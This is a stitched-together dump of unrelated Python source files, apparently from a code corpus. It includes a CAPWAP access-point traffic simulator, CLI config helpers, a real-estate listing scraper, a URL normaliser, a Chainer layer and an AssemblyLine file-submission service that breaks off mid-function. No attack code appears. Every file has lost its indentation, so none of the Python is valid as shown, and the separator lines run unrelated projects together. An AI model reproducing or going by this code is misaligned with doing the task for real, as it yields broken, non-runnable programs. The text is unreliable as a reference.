while not timer.has_expired() and not self.ap.mac_dst_bytes:
yield ('sleep', 0.1)
if self.ap.wlc_ip_bytes and not self.ap.mac_dst_bytes:
yield ('err', 'Unable to resolve MAC address of WLC for %s' % self.ap.ip_dst)
self.ap.rx_responses[2] = -1
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
RetransmitInterval *= 2
discovery_pkt = self.ap.wrap_capwap_pkt(CAPWAP_PKTS.discovery(self.ap), is_discovery = True)
yield ('put', discovery_pkt)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired():
result_code = self.ap.rx_responses[2]
if result_code in (None, 0, 2):
self.log('Got discovery response from %s' % self.ap.ip_dst)
yield 'done'
if result_code != -1:
self.ap.mac_dst_bytes = None
self.ap.mac_dst = None
yield ('err', 'Not successful result %s - %s.' % (result_code, capwap_result_codes.get(result_code, 'Unknown')))
yield ('sleep', 0.1)
self.ap.mac_dst_bytes = None
self.ap.mac_dst = None
yield 'time'
class ServiceApEstablishDTLS(ServiceAp):
requires_dtls = False
aps_by_ssl = {}
@staticmethod
def openssl_callback(ssl, where, ret):
pipe = ServiceApEstablishDTLS.aps_by_ssl[ssl]['pipe']
ap = ServiceApEstablishDTLS.aps_by_ssl[ssl]['ap']
if libcrypto.BIO_ctrl_pending(ap.out_bio):
ssl_data = ap.ssl_read()
if ssl_data:
pkt = ap.wrap_capwap_pkt(b'\1\0\0\0' + ssl_data)
pipe.async_tx_pkt(PacketBuffer(pkt))
return 0
ssl_info_callback_type = CFUNCTYPE(c_int, c_void_p, c_int, c_int)
ssl_info_callback_func = ssl_info_callback_type(openssl_callback.__func__)
def run(self, pipe):
assert self.ap.ssl and (self.ap.ssl not in self.aps_by_ssl)
#assert not self.ap.is_dtls_established(), 'AP %s has already established DTLS connection!' % self.ap.name
self.aps_by_ssl[self.ap.ssl] = {'ap': self.ap, 'pipe': pipe}
with self.ap.ssl_lock:
libssl.SSL_clear(self.ap.ssl)
libssl.SSL_set_info_callback(self.ap.ssl, self.ssl_info_callback_func) # set ssl callback
libssl.SSL_do_handshake(self.ap.ssl)
try:
timer = PassiveTimer(5)
self.ap.info('Start handshake')
while not timer.has_expired():
if self.ap.is_handshake_done_libssl():
self.ap.is_handshake_done = True
return
if self.ap.is_dtls_closed_libssl():
self.ap.is_dtls_closed = True
self.err('DTLS session got closed for ap %s' % self.ap.name)
return
resps = yield pipe.async_wait_for_pkt(time_sec = 1, limit = 1)
if not resps:
continue
pkt_bytes = resps[0]['pkt']
is_dtls = struct.unpack('?', pkt_bytes[42:43])[0]
if is_dtls:
self.ap.decrypt(pkt_bytes[46:])
self.timeout()
finally:
with self.ap.ssl_lock:
libssl.SSL_set_info_callback(self.ap.ssl, None) # remove ssl callback
if self.ap.ssl in self.aps_by_ssl:
del self.aps_by_ssl[self.ap.ssl]
class ServiceApEncryptedControl(ServiceAp):
def control_round_trip(self, tx_pkt, expected_response_type):
self.ap.rx_responses[expected_response_type] = -1
RetransmitInterval = self.ap.capwap_RetransmitInterval
if isinstance(tx_pkt, Packet) and self.ap.is_debug:
tx_pkt.show2()
for _ in range(self.ap.capwap_MaxRetransmit):
RetransmitInterval *= 2
tx_pkt = self.ap.wrap_capwap_pkt(b'\1\0\0\0' + self.ap.encrypt(tx_pkt))
yield ('put', tx_pkt)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired():
result_code = self.ap.rx_responses[expected_response_type]
if result_code in (None, 0, 2):
yield 'good_resp'
if result_code != -1:
yield ('err', 'Not successful result %s - %s.' % (result_code, capwap_result_codes.get(result_code, 'Unknown')))
yield ('sleep', 0.1)
yield 'time'
class ServiceApJoinWLC(ServiceApEncryptedControl):
def run_with_buffer(self):
self.log('Sending Join Request')
ctrl_gen = self.control_round_trip(CAPWAP_PKTS.join(self.ap), 4)
send_data = None
while True:
action = ctrl_gen.send(send_data)
if action == 'good_resp':
ctrl_gen.close()
break
else:
send_data = yield action
self.log('Got Join Response')
self.log('Sending Configuration Status Request')
ctrl_gen = self.control_round_trip(CAPWAP_PKTS.conf_status_req(self.ap), 6)
send_data = None
while True:
action = ctrl_gen.send(send_data)
if action == 'good_resp':
ctrl_gen.close()
break
else:
send_data = yield action
self.log('Got Configuration Status Response')
self.log('Sending Change State Event Request')
ctrl_gen = self.control_round_trip(CAPWAP_PKTS.change_state(self.ap), 12)
send_data = None
while True:
action = ctrl_gen.send(send_data)
if action == 'good_resp':
ctrl_gen.close()
break
else:
send_data = yield action
self.log('Got Change State Event Response')
self.log('Going to ack all config updates and try to get SSID')
while self.ap.last_recv_ts + 5 > time.time(): # ack all config updates in BG thread
if self.ap.SSID:
break
if self.ap.is_dtls_closed:
return
yield ('sleep', 0.1)
if not self.ap.SSID:
yield ('err', 'Did not get SSID from WLC!')
self.log('Sending Keep-alive.')
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
RetransmitInterval *= 2
tx_pkt = self.ap.wrap_capwap_pkt(CAPWAP_PKTS.keep_alive(self.ap), dst_port = 5247)
if self.ap.is_debug:
Ether(tx_pkt).show2()
yield ('put', tx_pkt)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired():
if self.ap.got_keep_alive:
self.log('Received Keep-alive response.')
self.ap.last_echo_req_ts = time.time()
self.ap.is_connected = True
return
if self.ap.is_dtls_closed:
return
yield ('sleep', 0.1)
yield 'time'
class ServiceApAddClients(ServiceAp):
def __init__(self, ap, clients, verbose_level = Service.WARN):
ServiceAp.__init__(self, ap, verbose_level)
assert type(clients) is list
assert all([hasattr(c, 'mac') and hasattr(c, 'ip') for c in clients]), 'Clients should have attributes mac and ip'
self.clients = clients
def run_with_buffer(self):
if self.ap.get_open_auth_vap() is None:
yield ('err', 'No Open Auth SSID has been received by AP')
return
self.log('Sending Association requests.')
need_assoc_resp_clients = list(self.clients)
for client in need_assoc_resp_clients:
client.reset()
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
if not need_assoc_resp_clients:
break
RetransmitInterval *= 2
tx_pkts = []
for client in need_assoc_resp_clients:
tx_pkt = CAPWAP_PKTS.client_assoc(self.ap, vap=self.ap.get_open_auth_vap(), client_mac = client.mac_bytes)
tx_pkts.append(self.ap.wrap_capwap_pkt(tx_pkt, dst_port = 5247))
yield ('put', tx_pkts)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired() and need_assoc_resp_clients:
yield ('sleep', 0.1)
for client in list(need_assoc_resp_clients):
if client.got_disconnect or client.is_associated:
need_assoc_resp_clients.remove(client)
not_assoc = [client.ip for client in self.clients if not client.is_associated]
if not_assoc:
yield ('err', 'No Association response for clients: %s' % ', '.join(sorted(not_assoc, key = natural_sorted_key)))
need_arp_resp_clients = list(self.clients)
RetransmitInterval = self.ap.capwap_RetransmitInterval
for _ in range(self.ap.capwap_MaxRetransmit):
if not need_arp_resp_clients:
return
RetransmitInterval *= 2
tx_pkts = []
for client in need_arp_resp_clients:
garp = self.ap.get_arp_pkt('garp', src_mac_bytes=client.mac_bytes, src_ip_bytes=client.ip_bytes)
tx_pkts.append(self.ap.wrap_pkt_by_wlan(client, garp))
arp = self.ap.get_arp_pkt('who-has', src_mac_bytes=client.mac_bytes, src_ip_bytes=client.ip_bytes)
tx_pkts.append(self.ap.wrap_pkt_by_wlan(client, arp))
yield ('put', tx_pkts)
timer = PassiveTimer(RetransmitInterval)
while not timer.has_expired() and need_arp_resp_clients:
yield ('sleep', 0.1)
for client in list(need_arp_resp_clients):
if client.got_disconnect or client.seen_arp_reply:
need_arp_resp_clients.remove(client)
class ServiceApShutdownDTLS(ServiceAp):
def run(self, pipe):
for client in self.ap.clients:
client.disconnect()
if not self.ap.is_dtls_established:
return
with self.ap.ssl_lock:
libssl.SSL_shutdown(self.ap.ssl)
tx_pkt = self.ap.wrap_capwap_pkt(b'\1\0\0\0' + self.ap.ssl_read())
self.ap.reset_vars()
yield pipe.async_tx_pkt(PacketBuffer(tx_pkt))
| StarcoderdataPython |
3466046 | <gh_stars>0
from __future__ import annotations
from datetime import datetime
import json
import os
from pathlib import Path
from typing import Any, Iterable, Optional
import click
import requests
import toml
from tqdm import tqdm
from xdg import BaseDirectory
from swcc.api import SwccSession
def raise_for_status(response: requests.Response):
try:
response.raise_for_status()
except requests.HTTPError:
data = None
try:
data = json.dumps(response.json(), indent=2)
except Exception:
data = response.text
if data:
click.echo(click.style(f'Received:\n{data}\n', fg='yellow'), err=True)
raise
def download_file(r: requests.Response, dest: Path, name: str, mtime: Optional[datetime] = None):
filename = dest / name
with tqdm.wrapattr(
open(filename, 'wb'),
'write',
miniters=1,
desc=str(filename),
total=int(r.headers.get('content-length', 0)),
) as f:
for chunk in r.iter_content(1024 * 1024 * 16):
f.write(chunk)
if mtime:
os.utime(filename, (datetime.now().timestamp(), mtime.timestamp()))
def files_to_upload(session: SwccSession, existing: Iterable, path: Path) -> Iterable[Path]:
existing_filenames = set([e.name for e in existing])
for filename in os.listdir(path):
if filename not in existing_filenames:
yield Path(path / filename)
def upload_path(session: SwccSession, path: Path, field: str, name=None) -> str:
if name is None:
name = path.name
with path.open('rb') as f:
return session.s3ff.upload_file(f, name, field)['field_value']
def update_config_value(filename: str, key: str, value: Any) -> None:
from swcc import SWCC_CONFIG_PATH
BaseDirectory.save_config_path(SWCC_CONFIG_PATH)
config_dir = BaseDirectory.load_first_config(SWCC_CONFIG_PATH)
config_file = os.path.join(config_dir, filename)
if os.path.exists(config_file):
with open(config_file, 'r') as infile:
config = toml.load(infile)
config['default'][key] = value
else:
config = {'default': {key: value}}
with open(config_file, 'w') as outfile:
toml.dump(config, outfile)
def get_config_value(filename: str, key: str) -> Optional[Any]:
from swcc import SWCC_CONFIG_FILE, SWCC_CONFIG_PATH
BaseDirectory.save_config_path(SWCC_CONFIG_PATH)
config_dir: Optional[str] = BaseDirectory.load_first_config(SWCC_CONFIG_PATH)
if config_dir:
config_file = os.path.join(config_dir, SWCC_CONFIG_FILE)
if os.path.exists(config_file):
with open(config_file, 'r') as infile:
config = toml.load(infile)['default']
return config.get(key)
return None
| StarcoderdataPython |
1669357 | <reponame>cmsong111/NJ_code
arr = []
count = int(input())
for i in range(count):
x, y =map(int,input().split())
arr.append([y,x])
arr.sort()
for i in range(count):
print(arr[i][1],arr[i][0])
| StarcoderdataPython |
9608878 | import re
import time
import requests
import logging
import googlemaps
from io import BytesIO
from bs4 import BeautifulSoup
from typing import List, Tuple
from real_estate_it.model.search import Search
from real_estate_it.model.house import House
logger = logging.getLogger(__name__)
class Immobiliare:
def __init__(self,
search: Search,
enable_multipages: bool = True,
max_pages: int = 100,
enrich_geolocation: bool = True,
google_maps_key: str = None):
"""
Get all the the houses that match the search conditions
"""
self.search_data = search
self.urls_ = None
self.verbose = True
self.url = self.search_data.get_url_immobiliare()
self.wait = 0.001 # waiting time in seconds
self.max_pages = max_pages
self.enable_multipages = enable_multipages
self.min_acceptable_price = 1000 # houses less than 1k will probably have wrong price
self.enrich_geolocation = enrich_geolocation
self.maps_key = google_maps_key
if self.enrich_geolocation:
logger.info(f"Requiring geolocalitaion. Using Google key: {self.maps_key}")
else:
logger.info(f"Skipping geolocalization enrichment")
def get_all_houses(self, limit: None) -> List:
"""
Get all the info for each of the parsed houses
:return: list of houses
"""
if not self.urls_:
self.urls_ = self.get_all_urls(limit)
all_results = []
for url in self.urls_:
try:
logger.info(f"Getting data from '{url}'")
all_results.append(self._get_data(url))
except Exception as e:
logger.warning(f"offending_url='%s' [%s]", url, e)
return all_results
def get_all_urls(self, limit: int = None) -> List[str]:
"""
Retrieve all the houses links parsing all the pages
:return: List of urls
"""
urls_ = []
# first page
logger.info(f"Processing page 1: {self.url}")
urls_ += self.parse_single_page(self.url, limit)
if len(urls_) >= limit:
return urls_
if self.enable_multipages:
# trying other pages
logger.debug("Processing further pages")
for i in range(2, self.max_pages): # that's enough of pages
logger.info(f"Processing page {i}")
curr_url = self.url + f"&pag={i}"
t = self._get_text(curr_url).lower()
if "404 not found" in t:
# no more pages found
break
urls_ += self.parse_single_page(curr_url)
if len(urls_) > limit:
return urls_
logger.info("All retrieved urls in attribute 'urls_'")
logger.info(f"Found {len(urls_)} houses matching criteria.")
return urls_
def parse_single_page(self, curr_url: str, limit: int = None) -> List[str]:
"""
Identify ads from single page
:param curr_url: Url
:param limit
:return: List of urls
"""
url_list = []
pattern = re.compile(r"\d+\/$")
page = self._get_page(curr_url)
page.seek(0)
soup = BeautifulSoup(page, "html.parser")
for link in soup.find_all("a"):
time.sleep(self.wait)
l = link.get("href")
if l is None:
continue
if "https" in l and "annunci" in l:
if pattern.search(l):
url_list.append(l)
if limit and len(url_list) >= limit:
return url_list
return url_list
@staticmethod
def _get_page(url):
req = requests.get(url, allow_redirects=False)
page = BytesIO()
page.write(req.content)
return page
@staticmethod
def _get_text(sub_url):
req = requests.get(sub_url, allow_redirects=False)
page = BytesIO()
page.write(req.content)
page.seek(0)
soup = BeautifulSoup(page, "html.parser")
text = soup.get_text() # ?? OK on Mac, mayhem on Windows
# compacting text
t = text.replace("\n", "")
for _ in range(50): # that would be sufficient..
t = t.replace(" ", " ")
return t
def _get_data(self, sub_url: str):
"""
This gets data from *one* of the sub-urls
"""
car_not_found = "n/a"
t = self._get_text(sub_url).lower()
address = self.parse_address(t)
cost = self.parse_cost(t, sub_url)
floor, ultimo = self.parse_floor(t)
area = self.parse_area(t, sub_url)
energy = self.parse_energetic_class(t, sub_url)
car = self.parse_car_spot(t, sub_url)
lat = 0
lng = 0
if self.enrich_geolocation:
lat, lng = self.get_geolocation(address)
# €/m²
try:
price_per_area = round(int(cost) / int(area), 1)
except Exception:
price_per_area = "n/a"
# Generate result
res = House(cost, price_per_area, floor, area, ultimo, sub_url, energy, car, address, lat, lng)
return res
def parse_address(self, t: str) -> str:
# address
address = "n/d"
address_patterns = (
r"((via|viale|piazza|corso|piazzale) \w+(\s\w+){1,}(.|,))",
)
for pattern in address_patterns:
add_pattern = re.compile(pattern)
address = add_pattern.search(t)
if address is not None:
return address.group(1)
return address
def parse_cost(self, t: str, sub_url: str) -> str:
price_not_found = -1
# price
cost_patterns = (
"€ (\d+\.\d+\.\d+)", # if that's more than 1M €
"€ (\d+\.\d+)"
)
for pattern in cost_patterns:
cost_pattern = re.compile(pattern)
try:
cost = cost_pattern.search(t)
cost = cost.group(1).replace(".", "")
break
except AttributeError:
continue
if cost is None:
if "prezzo su richiesta" in t:
logger.info(f"Price available upon request for {sub_url}")
cost = price_not_found
else:
logger.info(f"Can't get price for {sub_url}")
cost = price_not_found
if cost is not None and cost is not price_not_found:
# wrong house cost - price is too low
if int(cost) < self.min_acceptable_price:
if "prezzo su richiesta" in t:
logger.info(f"Price available upon request for {sub_url}")
cost = price_not_found
else:
logger.info(f"Too low house price: {int(cost)}? for {sub_url}")
cost = price_not_found
return cost
def parse_floor(self, t: str) -> str:
floor_patterns = (
r"piano (\d{1,2})",
r"(\d{1,2}) piano",
# if ultimo piano, floor number can be left out
r"(\d{1,2}) piani"
)
for pattern in floor_patterns:
floor_pattern = re.compile(pattern)
floor = floor_pattern.search(t)
if floor is not None:
floor = floor.group(1)
break
if "piano terra" in t:
floor = 1
if "ultimo" in t:
ultimo = True
else:
ultimo = False
return floor, ultimo
def parse_area(self, t: str, sub_url: str) -> str:
area_not_found = "n/a"
# Square meters
area_pattern = re.compile(r"superficie (\d{1,4}) m")
try:
area = area_pattern.search(t)
area = area.group(1)
except AttributeError:
area = area_not_found
if "asta" in t:
logger.info(f"Auction house: no area info {sub_url}")
else:
logger.info(f"Can't get area info from url {sub_url}")
return area
def parse_energetic_class(self, t: str, sub_url: str) -> str:
energy_not_found = "n/a"
# Energetic class
energy_patterns = (
r"energetica (\D{1,2}) ",
r"energetica(\S{1,2})",
)
for i, pattern in enumerate(energy_patterns):
energy_pattern = re.compile(pattern)
energy = energy_pattern.search(t)
if energy is not None:
energy = energy.group(1).upper()
if self.energy_acceptable(energy):
break
if energy is None or not self.energy_acceptable(energy): # in case everything fails
if "in attesa di certificazione" in t:
logger.info(f"Energy efficiency still pending for {sub_url} ")
energy = energy_not_found
else:
logger.info(f"Can't get energy efficiency from {sub_url}")
energy = energy_not_found
return energy
def parse_car_spot(self, t: str, sub_url: str) -> str:
car_not_found = "n/a"
# Car spot
car_patterns = (r"post\S auto (\d{1,2})",)
for pattern in car_patterns:
car_pattern = re.compile(pattern)
car = car_pattern.search(t)
if car is not None:
car = car.group(1)
break
if car is None:
available_upon_request = re.compile(r"possibilit\S.{0,10}auto")
if available_upon_request.search(t) is not None:
logger.info(f"Car spot/box available upon request for {sub_url}")
car = 0
else:
car = car_not_found
return car
def get_geolocation(self, address: str) -> Tuple[float, float]:
lat = 0.0
long = 0.0
address += f" {self.search_data.city}"
try:
gmaps = googlemaps.Client(key=self.maps_key)
# Geocoding an address
geocode_result = gmaps.geocode(address)
if isinstance(geocode_result, list):
lat = geocode_result[0]["geometry"]["location"]["lat"]
long = geocode_result[0]["geometry"]["location"]["lng"]
except Exception as ex:
logger.warning(f"unable to get location from {address}. [Exception: {ex}]")
return lat, long
def energy_acceptable(self, stringlike):
if not stringlike.startswith(("A", "B", "C", "D", "E", "F", "G")):
return False
else:
if len(stringlike) == 1:
return True
else:
if not stringlike.endswith(
("0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+")
):
return False
else:
return True
| StarcoderdataPython |
9723650 | <filename>supertokens_python/normalised_url_domain.py
# Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License") as published by the Apache Software Foundation.
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from typing import TYPE_CHECKING
from urllib.parse import urlparse
from .utils import is_an_ip_address
if TYPE_CHECKING:
pass
from .exceptions import raise_general_exception
class NormalisedURLDomain:
def __init__(self, url: str):
self.__value = normalise_domain_path_or_throw_error(url)
def get_as_string_dangerous(self):
return self.__value
def normalise_domain_path_or_throw_error(
input_str: str, ignore_protocol=False) -> str:
input_str = input_str.strip().lower()
try:
if (not input_str.startswith('http://')) and (not input_str.startswith('https://')) and \
(not input_str.startswith('supertokens://')):
raise Exception('converting to proper URL')
url_obj = urlparse(input_str)
if ignore_protocol:
if url_obj.hostname.startswith('localhost') or is_an_ip_address(url_obj.hostname):
input_str = 'http://' + url_obj.netloc
else:
input_str = 'https://' + url_obj.netloc
else:
input_str = url_obj.scheme + '://' + url_obj.netloc
return input_str
except Exception:
pass
if input_str.startswith('/'):
raise_general_exception('Please provide a valid domain name')
if input_str.startswith('.'):
input_str = input_str[1:]
if (
(
'.' in input_str
or
input_str.startswith('localhost')
)
and
(not input_str.startswith('http://'))
and
(not input_str.startswith('https://'))
):
input_str = 'https://' + input_str
try:
urlparse(input_str)
return normalise_domain_path_or_throw_error(input_str, True)
except Exception:
pass
raise_general_exception('Please provide a valid domain name')
| StarcoderdataPython |
3210369 | <reponame>neurothrone/project-dot
from http import HTTPStatus
from .. import BaseClientTestCase
class ClientOpenTestCase(BaseClientTestCase):
def test_index_route(self):
response = self.client.get("/",
follow_redirects=True)
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertTrue("Search for Developers" in
response.get_data(as_text=True))
| StarcoderdataPython |
6653935 | <gh_stars>10-100
import chainer
from chainer import functions
from chainer import initializers
from ..functions import affine_channel_2d
class AffineChannel2D(chainer.Link):
"""A simple channel-wise affine transformation operation"""
def __init__(self, channels):
super(AffineChannel2D, self).__init__()
with self.init_scope():
self.W = chainer.variable.Parameter(
initializers.One(), (channels,))
self.b = chainer.variable.Parameter(
initializers.Zero(), (channels,))
def __call__(self, x):
W = functions.reshape(self.W, (1, -1, 1, 1))
b = functions.reshape(self.b, (1, -1, 1, 1))
return affine_channel_2d(x, W, b)
# return affine_channel_2d_naive(x, W, b) # use too large memory
| StarcoderdataPython |
3406443 | <gh_stars>10-100
""" File Submission Service and Interfaces.
The Submission service encapsulates the core functionality of accepting,
triaging and forwarding a submission to the dispatcher.
SubmissionServer is typically exposed via HTTP interface implemented by al_ui,
however the core logic is implemented in SubmissionService to provide
seperation between the network rpc interface and the actual submission logic.
There are three primary modes of submission:
two-phase (presubmit + submit)
inline (submit file)
existing (submit a file that is already in the file cache/SAN)
In two-phase mode, submission is a presubmit followed by a submit.
A 'presubmit' is sent to the submission service first. If the server already
has a copy of the sample it indicates as such to the client which saves the
client from copying the file again. Once the client has copied the file
(if required) it then issues a final 'submit'.
"""
import logging
import os
import pprint
import uuid
import tempfile
import time
from assemblyline.al.common import forge
from assemblyline.al.common.task import Task
from assemblyline.al.common.remote_datatypes import ExpiringHash
from assemblyline.al.core.filestore import CorruptedFileStoreException
from assemblyline.common import digests
from assemblyline.common import identify
from assemblyline.common.charset import safe_str
from assemblyline.common.isotime import now_as_iso
log = logging.getLogger('assemblyline.submission')
config = forge.get_config()
SUBMISSION_AUTH = (safe_str(config.submissions.user), safe_str(config.submissions.password))
SHARDS = config.core.dispatcher.shards
class SubmissionException(Exception):
pass
def assert_valid_file(path):
if not os.path.exists(path):
raise Exception('File does not exist: %s' % path)
if os.path.isdir(path):
raise Exception('Expected file. Found directory: %s' % path)
def assert_valid_sha256(sha256):
if len(sha256) != 64:
raise Exception('Invalid SHA256: %s' % sha256)
def effective_ttl(settings):
return settings.get('ttl', config.submissions.ttl)
def max_extracted(settings):
return settings.get('max_extracted', config.services.limits.max_extracted)
def max_supplementary(settings):
return settings.get('max_supplementary', config.services.limits.max_supplementary)
def ttl_to_expiry(ttl):
return now_as_iso(int(ttl) * 24 * 60 * 60)
class SubmissionWrapper(object):
@classmethod
def check_exists(cls, transport, sha256_list):
log.debug("CHECK EXISTS (): %s", sha256_list)
existing = []
missing = []
for sha256 in sha256_list:
if not transport.exists(sha256):
missing.append(sha256)
else:
existing.append(sha256)
return {'existing': existing, 'missing': missing}
# noinspection PyBroadException
@classmethod
def identify(cls, transport, storage, sha256, **kw):
""" Identify a file. """
assert_valid_sha256(sha256)
classification = kw['classification']
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
# By the time identify is called, either the file was in our cache
# and we freshed its ttl or the client has successfully transfered
# the file to us.
local_path = transport.local_path(sha256)
if not local_path:
path = kw.get("path", None)
if path and os.path.exists(path):
local_path = path
if not transport.exists(sha256):
log.warning('File specified is not on server: %s %s.',
sha256, str(transport))
return None
temporary_path = fileinfo = None
try:
if not local_path:
temporary_path = tempfile.mktemp(prefix="submission.identify")
transport.download(sha256, temporary_path)
local_path = temporary_path
fileinfo = identify.fileinfo(local_path)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
finally:
if temporary_path:
try:
os.unlink(temporary_path)
except: # pylint: disable=W0702
pass
return fileinfo
@classmethod
def presubmit(cls, transport, sha256, **kw):
""" Execute a presubmit.
Checks if this file is already cached.
If not, it returns a location for the client to copy the file.
result dictionary example:
{ 'exists': False,
'sha256': u'012345678....9876543210',
'upload_path': u'/home/aluser/012345678....9876543210'
}
"""
log.debug("PRESUBMIT: %s", sha256)
assert_valid_sha256(sha256)
if transport.exists(sha256):
return SubmissionWrapper.result_dict(transport, sha256, True, None, kw)
# We don't have this file. Tell the client as much and tell it where
# to transfer the file before issuing the final submit.
log.debug('Cache miss. Client should transfer to %s', sha256)
return SubmissionWrapper.result_dict(transport, sha256, False, sha256, kw)
# noinspection PyBroadException
@classmethod
def submit(cls, transport, storage, sha256, path, priority, submitter, **kw):
""" Execute a submit.
Any kw are passed along in the dispatched request.
"""
assert_valid_sha256(sha256)
queue = forge.get_dispatch_queue()
classification = kw['classification']
kw['max_extracted'] = max_extracted(kw)
kw['max_supplementary'] = max_supplementary(kw)
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
# By the time submit is called, either the file was in our cache
# and we freshed its ttl or the client has successfully transfered
# the file to us.
local_path = transport.local_path(sha256)
if not transport.exists(sha256):
raise SubmissionException('File specified is not on server: %s %s.' % (sha256, str(transport)))
root_sha256 = sha256
temporary_path = massaged_path = None
try:
if not local_path:
temporary_path = tempfile.mktemp(prefix="submission.submit")
transport.download(sha256, temporary_path)
local_path = temporary_path
fileinfo = identify.fileinfo(local_path)
if fileinfo['sha256'] != sha256:
raise CorruptedFileStoreException('SHA256 mismatch between received '
'and calculated sha256. %s != %s' % (sha256, fileinfo['sha256']))
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
decode_file = forge.get_decode_file()
massaged_path, _, fileinfo, al_meta = decode_file(local_path, fileinfo)
if massaged_path:
local_path = massaged_path
sha256 = fileinfo['sha256']
transport.put(local_path, sha256)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
if fileinfo['size'] > max_size and not ignore_size:
msg = "File too large (%d > %d). Submission failed" % (fileinfo['size'], max_size)
raise SubmissionException(msg)
# We'll just merge the mandatory arguments, fileinfo, and any
# optional kw and pass those all on to the dispatch callback.
task_args = fileinfo
task_args.update(kw)
task_args.update({
'original_selected': kw.get('selected', []),
'root_sha256': root_sha256,
'srl': sha256,
'sha256': sha256,
'priority': priority,
'submitter': submitter,
'path': safe_str(path)})
if 'metadata' in task_args:
task_args['metadata'].update(al_meta)
else:
task_args['metadata'] = al_meta
submit_task = Task.create(**task_args)
if submit_task.is_initial():
storage.create_submission(
submit_task.sid,
submit_task.as_submission_record(),
[(os.path.basename(path), submit_task.srl)])
log.debug("Submission complete. Dispatching: %s", submit_task)
queue.send(submit_task, shards=SHARDS)
return submit_task.raw
finally:
if massaged_path:
try:
os.unlink(massaged_path)
except: # pylint:disable=W0702
pass
if temporary_path:
try:
os.unlink(temporary_path)
except: # pylint:disable=W0702
pass
@classmethod
def submit_inline(cls, storage, transport, file_paths, **kw):
""" Submit local samples to the submission service.
submit_inline can be used when the sample to submit is already
local to the submission service. It does the presumit, filestore
upload and submit.
Any kw are passed to the Task created to dispatch this submission.
"""
classification = kw['classification']
kw['max_extracted'] = max_extracted(kw)
kw['max_supplementary'] = max_supplementary(kw)
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
submissions = []
file_tuples = []
dispatch_request = None
# Generate static fileinfo data for each file.
for file_path in file_paths:
file_name = os.path.basename(file_path)
fileinfo = identify.fileinfo(file_path)
ignore_size = kw.get('ignore_size', False)
max_size = config.submissions.max.size
if fileinfo['size'] > max_size and not ignore_size:
msg = "File too large (%d > %d). Submission Failed" % \
(fileinfo['size'], max_size)
raise SubmissionException(msg)
decode_file = forge.get_decode_file()
temp_path, original_name, fileinfo, al_meta = \
decode_file(file_path, fileinfo)
if temp_path:
file_path = temp_path
if not original_name:
original_name = os.path.splitext(file_name)[0]
file_name = original_name
sha256 = fileinfo['sha256']
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
file_tuples.append((file_name, sha256))
if not transport.exists(sha256):
log.debug('File not on remote filestore. Uploading %s', sha256)
transport.put(file_path, sha256, location='near')
if temp_path:
os.remove(temp_path)
# We'll just merge the mandatory arguments, fileinfo, and any
# optional kw and pass those all on to the dispatch callback.
task_args = fileinfo
task_args['priority'] = 0 # Just a default.
task_args.update(kw)
task_args['srl'] = sha256
task_args['original_filename'] = file_name
task_args['path'] = file_name
if 'metadata' in task_args:
task_args['metadata'].update(al_meta)
else:
task_args['metadata'] = al_meta
dispatch_request = Task.create(**task_args)
submissions.append(dispatch_request)
storage.create_submission(
dispatch_request.sid,
dispatch_request.as_submission_record(),
file_tuples)
dispatch_queue = forge.get_dispatch_queue()
for submission in submissions:
dispatch_queue.submit(submission)
log.debug("Submission complete. Dispatched: %s", dispatch_request)
# Ugly - fighting with task to give UI something that makes sense.
file_result_tuples = \
zip(file_paths, [dispatch_request.raw for dispatch_request in submissions])
result = submissions[0].raw.copy()
fileinfos = []
for filename, result in file_result_tuples:
finfo = result['fileinfo']
finfo['original_filename'] = os.path.basename(filename)
finfo['path'] = finfo['original_filename']
fileinfos.append(finfo)
result['fileinfo'] = fileinfos
return result
# noinspection PyBroadException
@classmethod
def submit_multi(cls, storage, transport, files, **kw):
""" Submit all files into one submission
submit_multi can be used when all the files are already present in the
file storage.
files is an array of (name, sha256) tuples
Any kw are passed to the Task created to dispatch this submission.
"""
sid = str(uuid.uuid4())
classification = kw['classification']
kw['max_extracted'] = max_extracted(kw)
kw['max_supplementary'] = max_supplementary(kw)
kw['ttl'] = ttl = effective_ttl(kw)
kw['__expiry_ts__'] = expiry = ttl_to_expiry(ttl)
submissions = []
temporary_path = None
dispatch_request = None
# Generate static fileinfo data for each file.
for name, sha256 in files:
local_path = transport.local_path(sha256)
if not transport.exists(sha256):
raise SubmissionException('File specified is not on server: %s %s.' % (sha256, str(transport)))
try:
if not local_path:
temporary_path = tempfile.mktemp(prefix="submission.submit_multi")
transport.download(sha256, temporary_path)
local_path = temporary_path
fileinfo = identify.fileinfo(local_path)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
decode_file = forge.get_decode_file()
massaged_path, new_name, fileinfo, al_meta = \
decode_file(local_path, fileinfo)
if massaged_path:
name = new_name
local_path = massaged_path
sha256 = fileinfo['sha256']
if not transport.exists(sha256):
transport.put(local_path, sha256)
storage.save_or_freshen_file(sha256, fileinfo, expiry, classification)
